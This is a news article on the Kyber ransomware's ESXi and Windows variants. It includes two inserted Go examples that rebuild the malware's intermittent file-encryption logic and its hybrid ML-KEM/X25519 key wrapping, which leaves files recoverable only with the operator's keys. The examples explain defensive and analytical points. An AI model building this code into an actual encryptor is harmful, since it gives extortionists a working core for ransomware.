
    Kyber ransomware gang toys with post-quantum encryption on Windows

By admin, April 23, 2026
    A new Kyber ransomware operation is targeting Windows systems and VMware ESXi endpoints in recent attacks, with one variant implementing Kyber1024 post-quantum encryption.

    Cybersecurity firm Rapid7 retrieved and analyzed two distinct Kyber variants in March 2026 during an incident response. Both variants were deployed on the same network, with one targeting VMware ESXi and the other focusing on Windows file servers.

    “The ESXi variant is specifically built for VMware environments, with capabilities for datastore encryption, optional virtual machine termination, and defacement of management interfaces,” explains Rapid7.


“The Windows variant, written in Rust, includes a self-described ‘experimental’ feature for targeting Hyper-V.”

Both variants share the same campaign ID and the same Tor-based ransom infrastructure, indicating that they were deployed by a single ransomware affiliate, who likely sought to maximize impact by encrypting the ESXi hosts and the Windows file servers at the same time.

    BleepingComputer has found only one listed victim on the Kyber data extortion portal at the time of writing, which is a multi-billion-dollar American defense contractor and IT services provider.

Kyber ransomware victim extortion portal (image; source: BleepingComputer.com)

    Rapid7 says the ESXi variant enumerates all virtual machines (VMs) on the infrastructure, encrypts datastore files, and then defaces the ESXi interfaces with ransom notes to guide victims through the ransom payment and recovery process.

Although the ransom note advertises ‘post-quantum’ encryption based on Kyber1024 key encapsulation, Rapid7 found that this claim is false for the Linux ESXi encryptor.

The Linux version actually uses ChaCha8 for file encryption and RSA-4096 to wrap the file keys.

Small files (under 1 MB) are encrypted in full and given the ‘.xhsyw’ extension; files between 1 MB and 4 MB have only their first MB encrypted; files larger than 4 MB are encrypted intermittently according to the operator’s configuration, leaving the rest of each file in plaintext.
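To make that size-tiered, intermittent scheme concrete, here is an added example (it is not Rapid7’s code and was not recovered from the samples) that computes which byte ranges of a file the policy above would touch and then applies a stream cipher only to those ranges. Several things are assumptions of this example: the 1 MiB-every-3 MiB chunk/stride values (the article gives no real operator configuration), reading the 1 MB and 4 MB limits as MiB with inclusive upper bounds, and using AES-CTR as a stand-in for ChaCha8, which Go’s standard library does not provide. The RSA-4096 key wrapping is left out.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

const MiB int64 = 1 << 20

// ByteRange is a half-open [Start, End) span of the file that gets encrypted.
type ByteRange struct{ Start, End int64 }

// IntermittentConfig is the operator-chosen pattern for files over 4 MiB:
// encrypt Chunk bytes at the start of every Stride-byte window. The values
// used in main are assumptions; the article gives no real configuration.
type IntermittentConfig struct{ Chunk, Stride int64 }

// EncryptedRanges applies the size-tiered policy the article describes:
// under 1 MiB the whole file, 1 to 4 MiB only the first MiB, above 4 MiB
// the intermittent pattern. Reading the limits as MiB with inclusive upper
// bounds is an assumption.
func EncryptedRanges(size int64, cfg IntermittentConfig) []ByteRange {
	switch {
	case size <= 0:
		return nil
	case size < MiB:
		return []ByteRange{{0, size}}
	case size <= 4*MiB:
		return []ByteRange{{0, MiB}}
	}
	if cfg.Chunk <= 0 || cfg.Stride < cfg.Chunk {
		panic("intermittent config needs 0 < Chunk <= Stride")
	}
	var out []ByteRange
	for off := int64(0); off < size; off += cfg.Stride {
		out = append(out, ByteRange{off, min(off+cfg.Chunk, size)})
	}
	return out
}

// EncryptedBytes sums the bytes the ranges cover.
func EncryptedBytes(rs []ByteRange) int64 {
	var n int64
	for _, r := range rs {
		n += r.End - r.Start
	}
	return n
}

// NewCTRStream builds an AES-CTR keystream. It stands in for ChaCha8, which
// Go's standard library does not provide; the range logic is identical for
// any stream cipher.
func NewCTRStream(key, iv []byte) (cipher.Stream, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewCTR(block, iv), nil
}

// XORRanges encrypts, or with a fresh identical stream decrypts, only the
// selected ranges in place. Keystream is consumed contiguously across the
// ranges, so a decryptor must replay them in the same order.
func XORRanges(data []byte, rs []ByteRange, stream cipher.Stream) {
	for _, r := range rs {
		seg := data[r.Start:r.End]
		stream.XORKeyStream(seg, seg)
	}
}

func main() {
	cfg := IntermittentConfig{Chunk: MiB, Stride: 3 * MiB} // assumed values
	for _, size := range []int64{512 << 10, 2 * MiB, 4 * MiB, 10 * MiB} {
		rs := EncryptedRanges(size, cfg)
		enc := EncryptedBytes(rs)
		fmt.Printf("%6d KiB: %d range(s), %3.0f%% encrypted, %d bytes left in clear\n",
			size>>10, len(rs), 100*float64(enc)/float64(size), size-enc)
	}
}
```

Why responders care: with the assumed pattern, a 10 MiB file has four 1 MiB encrypted blocks and 60% of its content untouched, so file headers and long plaintext runs can often still be carved from “encrypted” data, and any decryptor has to replay exactly the same ranges in the same order.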

Ransom note embedded in the ELF binary (image; source: Rapid7)

    The Windows variant, written in Rust, implements Kyber1024 and X25519 for key protection, aligning with the ransom note’s claims.

    “This confirms that Kyber is not used for direct file encryption. Instead, Kyber1024 protects the symmetric key material, while AES-CTR handles bulk data encryption,” Rapid7 explains.

    While the use of post-quantum cryptography is notable, it does not change outcomes for victims. Whether the encryptor uses RSA or Kyber1024, files remain unrecoverable without access to the attacker’s private key.
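The structure Rapid7 describes for the Windows variant, a KEM protecting the per-file key material while a stream mode encrypts the bulk data, can be shown with Go’s standard library, which since Go 1.24 ships ML-KEM-1024 in crypto/mlkem. ML-KEM-1024 is the NIST-standardized form of Kyber1024 (the two differ in small details, so this would not interoperate with a build on the original Kyber reference code, but the construction is the same). The following is an added example and not the ransomware’s code: it wraps an AES-256-CTR file key under a hybrid of ML-KEM-1024 and X25519. The header layout, the 256-bit key size, the labelled SHA-256 combiner, and the OperatorKeys, EncryptedFile, Encrypt and Decrypt names are this example’s assumptions.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/mlkem"
	"crypto/rand"
	"crypto/sha256"
)

// OperatorKeys is the attacker-side secret material. An encryptor binary would
// embed only the public halves. This key layout is the example's assumption.
type OperatorKeys struct {
	KEM *mlkem.DecapsulationKey1024
	DH  *ecdh.PrivateKey
}

func GenerateOperatorKeys() (*OperatorKeys, error) {
	kem, err := mlkem.GenerateKey1024()
	if err != nil {
		return nil, err
	}
	dh, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &OperatorKeys{KEM: kem, DH: dh}, nil
}

// EncryptedFile is the assumed on-disk layout: a header with the ML-KEM
// ciphertext and the ephemeral X25519 public key, then the AES-256-CTR body.
type EncryptedFile struct {
	KEMCiphertext []byte // mlkem.CiphertextSize1024 bytes
	EphemeralDH   []byte // 32 bytes
	IV            []byte // aes.BlockSize bytes
	Body          []byte
}

// deriveFileKey combines both shared secrets so the file key survives unless
// both ML-KEM and X25519 fall. A labelled SHA-256 stands in for HKDF here.
func deriveFileKey(kemSS, dhSS []byte) []byte {
	h := sha256.New()
	h.Write([]byte("example-hybrid-file-key-v1"))
	h.Write(kemSS)
	h.Write(dhSS)
	return h.Sum(nil) // 32 bytes, so aes.NewCipher selects AES-256
}

func ctrXOR(key, iv, in []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(in))
	cipher.NewCTR(block, iv).XORKeyStream(out, in)
	return out, nil
}

// Encrypt is the per-file path: fresh encapsulation plus ephemeral ECDH, derive
// the key, encrypt the body, and keep only public values in the header.
func Encrypt(ek *mlkem.EncapsulationKey1024, opDH *ecdh.PublicKey, plaintext []byte) (*EncryptedFile, error) {
	kemSS, kemCT := ek.Encapsulate()
	eph, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	dhSS, err := eph.ECDH(opDH)
	if err != nil {
		return nil, err
	}
	iv := make([]byte, aes.BlockSize)
	rand.Read(iv) // documented never to fail since Go 1.24
	body, err := ctrXOR(deriveFileKey(kemSS, dhSS), iv, plaintext)
	if err != nil {
		return nil, err
	}
	return &EncryptedFile{KEMCiphertext: kemCT, EphemeralDH: eph.PublicKey().Bytes(), IV: iv, Body: body}, nil
}

// Decrypt needs both operator secrets. With the wrong decapsulation key,
// ML-KEM's implicit rejection still yields a shared secret, just a different
// one, so the output is garbage rather than an error.
func Decrypt(op *OperatorKeys, f *EncryptedFile) ([]byte, error) {
	kemSS, err := op.KEM.Decapsulate(f.KEMCiphertext)
	if err != nil {
		return nil, err
	}
	ephPub, err := ecdh.X25519().NewPublicKey(f.EphemeralDH)
	if err != nil {
		return nil, err
	}
	dhSS, err := op.DH.ECDH(ephPub)
	if err != nil {
		return nil, err
	}
	return ctrXOR(deriveFileKey(kemSS, dhSS), f.IV, f.Body)
}
```

The point the article makes holds here as well: the header carries only a 1568-byte KEM ciphertext and a 32-byte ephemeral public key, so recovering a file requires the operator’s decapsulation key and X25519 private key. Decrypting with any other key pair does not fail loudly; ML-KEM’s implicit rejection returns a different shared secret and the output is simply garbage, which is why swapping RSA for a lattice KEM changes nothing for the victim.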

    The Windows variant appends the ‘.#~~~’ extension to encrypted files, terminates services, deletes backups, and includes an experimental feature to shut down Hyper-V virtual machines.

Kyber for Windows CLI (image; source: Rapid7)

    It is designed to eliminate a broad range of data recovery paths, deleting shadow copies, disabling boot repair, killing SQL, Exchange, and backup services, clearing event logs, and wiping the Windows Recycle Bin.

    Rapid7 highlighted an unusual choice of a mutex in the Windows variant of Kyber, which appears to reference a song on the Boomplay music platform.

    Overall, the Windows variant appears more technically mature, while the ESXi variant currently lacks some of its features.

